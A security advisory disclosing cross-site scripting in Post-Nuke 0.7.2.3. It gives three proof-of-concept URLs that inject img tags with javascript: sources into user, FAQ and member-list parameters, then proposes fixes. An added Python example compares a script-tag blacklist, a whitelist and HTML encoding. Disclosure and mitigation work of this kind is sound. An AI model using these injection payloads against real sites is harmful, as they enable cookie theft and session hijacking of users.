Issue : Cross site scripting in Post-Nuke
Version affected : Post Nuke 0.7.2.3-Phoenix

Description :

Post-Nuke is a content management system that allows you to deploy a website easily. Its developers claim that their product is more secure than its competitors. I found three places where a script can be injected so that it executes in the context of the web page, making it possible to steal user cookies and hijack their sessions.

http://www.server.com/user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=lucas@pelucas.com

http://www.server.com/modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(document.cookie);%3E&parent_id=0

http://www.server.com/modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index

In each case the injected value is an <img> tag whose src is a javascript: URL (the leading %22%3E closes the attribute and tag the value is echoed into), so a filter that only removes <script> tags does not stop it.

Solution :

Although I am not a PHP developer, I think filtering of all non-alphanumeric characters is needed, not just filtering script tags passed to variables in the URL:

    $good_var = eregi_replace("[^a-z0-9]+", "", $var);

(eregi_replace was removed in PHP 7; preg_replace('/[^a-z0-9]+/i', '', $var) is the equivalent.) Note that this whitelist also destroys legitimate characters such as the @ and . in the email parameter; encoding the value with htmlspecialchars() at the point where it is written into the page neutralizes the payload while keeping the text intact.

You can find a Spanish version of this advisory at http://nautopia.org/vulnerabilidades/postnuke_xss.htm

Regards,
David F. Madrid, Madrid, Spain
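The following is an added example, not code from the advisory or from PostNuke, that decodes the three proof-of-concept URLs above and runs each injected parameter through three strategies: a filter that strips only <script> tags (the behaviour the advisory says is insufficient), the advisory's alphanumeric whitelist, and HTML entity encoding. It assumes the injected value is echoed into the value attribute of an <input> tag; the real PostNuke templates are not shown on the page, so that rendering context is a hypothetical stand-in, and the test it applies (did the parameter add a tag to the page?) is this example's own heuristic. The server name is the advisory's own placeholder.

```python
import html
import re
from urllib.parse import urlsplit, unquote

# The three proof-of-concept URLs from the advisory (www.server.com is a placeholder host).
ADVISORY_URLS = [
    "http://www.server.com/user.php?op=confirmnewuser&module=NS-NewUser"
    "&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=lucas@pelucas.com",
    "http://www.server.com/modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1"
    "&categories=%3Cimg%20src=javascript:alert(document.cookie);%3E&parent_id=0",
    "http://www.server.com/modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E"
    "&op=modload&name=Members_List&file=index",
]

# The parameter carrying the payload in each URL, in the same order.
INJECTED_PARAMS = ["uname", "categories", "letter"]


def query_params(url):
    """URL-decode the query string the way PHP fills $_GET: split on '&', then on the first '='."""
    params = {}
    for pair in urlsplit(url).query.split("&"):
        name, _, value = pair.partition("=")
        params[unquote(name)] = unquote(value)
    return params


def strip_script_tags_only(value):
    """A blacklist that removes <script> tags and nothing else; the advisory says this is not enough."""
    return re.sub(r"</?script[^>]*>", "", value, flags=re.IGNORECASE)


def alnum_whitelist(value):
    """The advisory's proposed fix: drop every character that is not a letter or digit."""
    return re.sub(r"[^a-z0-9]+", "", value, flags=re.IGNORECASE)


def html_encode(value):
    """Output encoding (what htmlspecialchars() does in PHP): < > & and quotes become entities."""
    return html.escape(value, quote=True)


def render_input(value):
    """Hypothetical rendering context: the parameter is echoed into a quoted attribute."""
    return '<input type="text" name="uname" value="%s">' % value


def tag_count(markup):
    """Number of start tags in the fragment; anything above one means the value broke out of the attribute."""
    return len(re.findall(r"<[a-zA-Z]", markup))


def compare_filters(url, param):
    """Render one advisory parameter through each strategy and count the tags the page ends up with."""
    raw = query_params(url)[param]
    return {
        "raw": tag_count(render_input(raw)),
        "script_tags_only": tag_count(render_input(strip_script_tags_only(raw))),
        "alnum_whitelist": tag_count(render_input(alnum_whitelist(raw))),
        "html_encoded": tag_count(render_input(html_encode(raw))),
    }


if __name__ == "__main__":
    for url, param in zip(ADVISORY_URLS, INJECTED_PARAMS):
        print(param, compare_filters(url, param))
    # The whitelist's cost: a legitimate value from the first URL is mangled, encoding leaves it alone.
    print(alnum_whitelist("lucas@pelucas.com"), "vs", html_encode("lucas@pelucas.com"))
```

For every one of the three payloads the script-tag blacklist leaves two tags in the output (the <input> plus the injected <img>), while both the whitelist and entity encoding bring it back to one. The difference between the last two shows in the email parameter: the whitelist turns lucas@pelucas.com into lucaspelucascom, whereas encoding returns it unchanged, which is why encoding at the output point is the fix a practitioner would reach for.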